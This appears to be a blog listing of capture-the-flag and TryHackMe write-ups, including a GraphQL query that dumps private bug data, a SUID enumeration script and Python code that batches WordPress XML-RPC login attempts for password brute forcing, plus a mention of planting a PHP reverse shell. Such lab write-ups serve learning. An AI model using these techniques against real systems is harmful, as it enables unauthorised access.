
Posts

Hacker 101 CTF Walkthrough: BugDB v3

Like the previous one, this CTF exposes mutations, so we will probably have to play with them. It is always a good idea to start with an introspection query and render it in GraphQL Voyager, which produced the following graph. Something new stands out in this graph: attachments. With that in mind, let's go through the documentation and carve out a query that returns all the data available on the endpoint:

    query {
      user {
        edges {
          node {
            id
            username
            bugs {
              edges {
                node {
                  id
                  private
                  reporterId
                  attachments {
                    edges {
                      node {
                        id
                        bugId
                        filename
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }

This query returns all the data as follows.
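A response to a query like the one above comes back as nested Relay-style connections (edges[].node at every level), which is tedious to read by eye once there are more than a handful of users. The following is an added example for this walkthrough, not code from the CTF or from Hacker 101: it flattens such a response into one record per bug so private bugs with attachments can be picked out immediately. The field names come from the query in the post; the sample response is constructed by hand, and the decoding of ids as base64("Type:id") is an assumption about how the endpoint builds its global ids, so decode_global_id returns None when an id is not shaped that way.

```python
"""Flatten a Relay-style GraphQL response (edges/node connections) into
flat records so a dump like the one returned by the BugDB v3 query can be
triaged quickly.

Added example for this walkthrough; not code from the CTF or Hacker 101.
Field names (user, bugs, attachments, private, reporterId, bugId, filename)
are taken from the query in the post. SAMPLE_RESPONSE is hand-constructed,
not captured from the real endpoint.
"""
import base64
import binascii
from typing import Any, Dict, Iterator, List, Optional, Tuple

# Constructed sample shaped like the v3 query (assumption: every list is a
# connection wrapped in edges[].node, which is what the query asks for).
SAMPLE_RESPONSE: Dict[str, Any] = {
    "data": {
        "user": {
            "edges": [
                {"node": {
                    "id": "VXNlcjox", "username": "admin",
                    "bugs": {"edges": [
                        {"node": {"id": "QnVnOjE=", "private": True, "reporterId": 1,
                                  "attachments": {"edges": [
                                      {"node": {"id": "QXR0OjE=", "bugId": 1,
                                                "filename": "secret.txt"}}]}}},
                    ]},
                }},
                {"node": {
                    "id": "VXNlcjoy", "username": "victim",
                    "bugs": {"edges": [
                        {"node": {"id": "QnVnOjI=", "private": False, "reporterId": 2,
                                  "attachments": {"edges": []}}},
                    ]},
                }},
            ]
        }
    }
}


def iter_nodes(connection: Dict[str, Any]) -> Iterator[Dict[str, Any]]:
    """Yield the node objects of a Relay connection ({"edges": [{"node": ...}]})."""
    for edge in connection.get("edges", []):
        node = edge.get("node")
        if node is not None:
            yield node


def decode_global_id(gid: str) -> Optional[Tuple[str, str]]:
    """Assumption: global ids are base64("Type:id"). Return (type, id) or None."""
    try:
        raw = base64.b64decode(gid, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    typ, sep, ident = raw.partition(":")
    return (typ, ident) if sep and typ and ident else None


def flatten_bugs(response: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return one flat record per bug, with its owner and attachment filenames."""
    records: List[Dict[str, Any]] = []
    for user in iter_nodes(response["data"]["user"]):
        for bug in iter_nodes(user.get("bugs", {})):
            decoded = decode_global_id(bug.get("id") or "")
            records.append({
                "username": user.get("username"),
                "bug_id": bug.get("id"),
                "bug_number": decoded[1] if decoded else None,
                "private": bool(bug.get("private")),
                "reporter_id": bug.get("reporterId"),
                "attachments": [a.get("filename")
                                for a in iter_nodes(bug.get("attachments", {}))],
            })
    return records


def private_bugs_with_attachments(response: Dict[str, Any]) -> List[Dict[str, Any]]:
    """The records worth looking at first: private bugs that carry files."""
    return [r for r in flatten_bugs(response) if r["private"] and r["attachments"]]


if __name__ == "__main__":
    for rec in flatten_bugs(SAMPLE_RESPONSE):
        print(rec)
```

Run it against a real response by replacing SAMPLE_RESPONSE with the parsed JSON the endpoint returns; the flattening does not depend on the sample values, only on the edges/node shape.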

Hacker 101 CTF Walkthrough: BugDB v2

This is the second GraphQL CTF on Hacker 101. Let's dive into it. Having learned from the previous one, BugDB v1, I didn't jump straight into the introspection graph this time; instead I opened the docs of the GraphQL endpoint, which showed that this endpoint also exposes mutations, meaning we can post or modify data on the server. Interesting. Let's follow the same approach and read the docs further, under Query: we can query a single user, find a user or a bug, and list all bugs and all users. Let's carve out a query that pulls most, if not all, of the data from the endpoint

My Transition to More Privacy-Focused Internet.

Back in October 2020, on a friend's recommendation, I watched The Social Dilemma, a Netflix documentary about the side effects of social media. Those side effects were described by none other than the people who built these platforms: former executives and engineers from Facebook, Google, YouTube, Pinterest and others explained how social media is becoming the social dilemma of this century. I won't go into the documentary in detail, but it ignited a spark in me. In response to The Social Dilemma, I've made lots of changes to my internet routine, one of them is shifting to @DuckDuckGo with @firefox, it's way better than Google if you consider privacy. Must give it a try! — Najam Ul Saqib (@NjmUlSqb) October 12, 2020

Lessons learned while escalating privileges on Vulnversity

After a long while away, busy with exams and other commitments, I decided to play on TryHackMe again. This time it was the Vulnversity room; I solved it and learned a lot of new things. Infosec is a field where you learn something new every day (if you are involved in it), so I decided to write up a few things I learned in this room for others. Most of the room's content was easy, such as the nmap scan and directory brute-forcing, but the last section, where we are asked to escalate privileges to root and finally grab the flag, was very interesting. I will be talking about "Task 5: Privilege Escalation" here. First of all, the concept of SUID is used here, so what is SUID? In the simplest terms, SUID (set-user-ID) is a permission bit on an executable file; when it is set, anyone who runs that file runs it with the privileges of the file's owner rather than their own, which is why a SUID binary owned by root is interesting. Now, what's so special about it? This is a temporary permission: that file u
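The first thing to do once you know what the SUID bit means is to enumerate every file that has it set and is owned by root, and the defensive twin of that step is to compare the list against a known-good baseline so a newly planted SUID binary stands out. The block below is an added example for this post, not part of the TryHackMe room: it does both with the standard library, and make_demo_tree builds a throwaway directory (constructed demo data, no root needed) so the functions can be exercised without scanning a real box.

```python
"""Enumerate set-user-ID executables and diff them against a baseline.

Added example for this post, not part of the TryHackMe room. find_suid is
the Python equivalent of `find / -type f -perm -4000 -user root`; the
baseline diff is the check a defender runs to spot a dropped SUID binary.
"""
import os
import stat
import tempfile
from typing import Iterator, Optional, Set, Tuple


def is_suid(path: str) -> bool:
    """True if path is a regular file with the set-user-ID bit (mode 4000) set.

    lstat is used so a symlink is never mistaken for the file it points to.
    """
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid(root: str = "/", owner_uid: Optional[int] = None) -> Iterator[Tuple[str, int]]:
    """Walk root and yield (path, owner uid) for every SUID regular file.

    Pass owner_uid=0 to keep only files that will execute as root, which is
    what matters for privilege escalation. Unreadable directories are
    skipped instead of aborting the walk, and symlinked directories are not
    followed, so the scan cannot loop.
    """
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames
                       if not os.path.islink(os.path.join(dirpath, d))]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_suid(path):
                uid = os.lstat(path).st_uid
                if owner_uid is None or uid == owner_uid:
                    yield path, uid


def suid_baseline_diff(root: str, baseline: Set[str]) -> Tuple[Set[str], Set[str]]:
    """Return (new, missing) SUID paths compared with a baseline set.

    `new` holds SUID files the baseline did not know about, the signal a
    defender wants after a box may have been tampered with; `missing` holds
    baseline entries that no longer carry the bit.
    """
    current = {path for path, _ in find_suid(root)}
    return current - baseline, baseline - current


def make_demo_tree() -> Tuple[str, str, str]:
    """Build a temporary tree with one SUID file and one plain file.

    Constructed demo data: setting mode 4755 on a file you own needs no
    root, so this runs as an ordinary user. Returns (root, suid, plain).
    """
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    suid_path = os.path.join(bindir, "suidme")
    plain_path = os.path.join(bindir, "plain")
    for p in (suid_path, plain_path):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nid\n")
    os.chmod(suid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    return root, suid_path, plain_path


if __name__ == "__main__":
    # On a real target: for path, uid in find_suid("/", owner_uid=0): print(path)
    root, suid_path, _ = make_demo_tree()
    print("SUID files under", root, ":", [p for p, _ in find_suid(root)])
```

On a live box, call find_suid("/", owner_uid=0) and check each hit against what you know about that binary; for the baseline check, save the set from a clean install and pass it to suid_baseline_diff later.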

Hacker 101 CTF Walkthrough: Petshop Pro

I am back with another walkthrough, this time of HackerOne's CTF Petshop Pro. Let's look at the interface of this web page.

How I got my first private invitation to a bug bounty program?

Bug bounty platforms are rapidly gaining popularity among ethical hackers and penetration testers. They provide crowdsourced security testing to companies: hackers look for security loopholes in the companies' websites and get paid for each valid submission. But as these platforms gain popularity and more and more people find security bugs in public programs, fewer vulnerabilities are left to be found there, so private invitations are the better choice. As the word "private" suggests, not everyone is allowed to hack on a private program the way they can on a public one; only selected hackers, chosen on the basis of their skills and achievements, are invited. I recently got invited to one such private program. It is pretty confusing for newbies to know how they can get invited to a private program, but don't worry, I'll make it clear and concise for you. HackerOne is a famous and probably the number one bug bounty platfor

Important points I learned from Mr Robot CTF

I did the Mr. Robot CTF today on www.tryhackme.com. I thought it would be better to share the lessons I learned from it rather than write a walkthrough (there are tons of walkthroughs of Mr. Robot available online).

GoBuster is better than DirBuster: I ran DirBuster against the machine for quite some time, but it missed some pages, including robots.txt. robots.txt is an important page here and it carried some useful information; GoBuster did find robots.txt, so in this case GoBuster performed better.

If it's WordPress, go nowhere but WPScan: if the target is WordPress-based then WPScan is your go-to tool for enumeration and brute-forcing. I tried different tools for brute-forcing credentials on the machine, such as Burp Intruder, Hydra and Metasploit, but they all took a lot of time, whereas the brute-forcing performed by WPScan (using XML-RPC, which I'll explain next) was fast and very efficient.

XML-RPC in WordPress: WPS
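The reason an XML-RPC brute force is so much faster than Hydra or Intruder hammering wp-login.php is that WordPress's xmlrpc.php accepts system.multicall, so many wp.getUsersBlogs login attempts can be packed into a single HTTP request and answered in one response. The block below is an added example for this post and is not WPScan's code: it builds the multicall body with the standard library's xmlrpc.client and parses the response into the list of passwords that worked. fake_wordpress_response produces a hand-constructed reply in the shape WordPress uses (a 403 "Incorrect username or password." fault per failed attempt, a blog list per success); the sample username and passwords are made up. One caveat worth knowing: to my knowledge WordPress 4.4 and later stop checking further credentials in the same multicall once one has failed, so against a current site the batch returns one real attempt followed by faults and the speed-up is gone, though the parser below still handles that shape correctly.

```python
"""Build and parse a WordPress XML-RPC system.multicall login batch.

Added example for this post; not WPScan's code. Uses only the standard
library. Sample username/passwords and the fake response are constructed.
"""
import xmlrpc.client as xc
from typing import Any, Dict, List

LOGIN_METHOD = "wp.getUsersBlogs"  # authenticated method WordPress exposes


def build_login_multicall(username: str, passwords: List[str]) -> str:
    """Return the XML body for one request that tries every password.

    system.multicall takes a single array of {methodName, params} structs.
    """
    calls = [{"methodName": LOGIN_METHOD, "params": [username, pw]}
             for pw in passwords]
    return xc.dumps((calls,), methodname="system.multicall")


def parse_login_multicall(body: str, passwords: List[str]) -> List[str]:
    """Return the passwords whose call succeeded.

    In a multicall response each element is either a one-element list
    holding the call's return value (success) or a struct with faultCode and
    faultString (failure). A <fault> for the whole request (for instance
    XML-RPC disabled) makes xmlrpc.client raise Fault, which is surfaced as
    an empty result here so the caller can tell "nothing worked" from
    "the batch was rejected" by catching it first if it cares.
    """
    try:
        (results,), _ = xc.loads(body)
    except xc.Fault:
        return []
    if len(results) != len(passwords):
        raise ValueError("response length does not match number of attempts")
    valid = []
    for pw, result in zip(passwords, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue  # this credential was rejected
        valid.append(pw)
    return valid


def fake_wordpress_response(passwords: List[str], real_password: str) -> str:
    """Constructed stand-in for xmlrpc.php's reply to build_login_multicall."""
    results: List[Any] = []
    for pw in passwords:
        if pw == real_password:
            blogs: List[Dict[str, Any]] = [
                {"blogid": "1", "blogName": "demo", "isAdmin": True}]
            results.append([blogs])  # success: one-element list with the value
        else:
            results.append({"faultCode": 403,
                            "faultString": "Incorrect username or password."})
    return xc.dumps((results,), methodresponse=True)


if __name__ == "__main__":
    # Constructed sample data; on a real engagement POST the body to
    # https://target/xmlrpc.php and feed the HTTP response text to the parser.
    user, candidates = "elliot", ["password", "123456", "letmein"]
    request_body = build_login_multicall(user, candidates)
    response_body = fake_wordpress_response(candidates, "letmein")
    print("valid:", parse_login_multicall(response_body, candidates))
```

Against a live site, send the body with any HTTP client (Content-Type: text/xml) and pass the response text to parse_login_multicall; keep the batch size modest, since a huge multicall is both slow for the server and an obvious log signature.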

Not getting Shell on Mr.Robot CTF on TryHackMe?

Well, this was my first machine on THM and I pulled my hair out over not getting a shell when I was doing everything right. It was the Mr. Robot CTF; I tried literally everything to get a shell: a PHP reverse shell, a Meterpreter session, Metasploit's wp_admin module, malicious WordPress plugins, all to no avail. I turned to TryHackMe's Discord server to check what I was doing wrong, and what came out was funny and frustrating at the same time 😅 Take the PHP reverse shell as an example: when you paste the PHP shell code into the 404.php page, you have to configure two things, your IP (LHOST) and your port. I was putting my eth0/wlan0 IP address into LHOST and never got anything back on netcat. TryHackMe connects you to its lab network over OpenVPN, so your eth0/wlan0 IP is not your LHOST; after connecting to OpenVPN, run the ip address command and use the tun0 IP address. This is your listening host, aka LHOS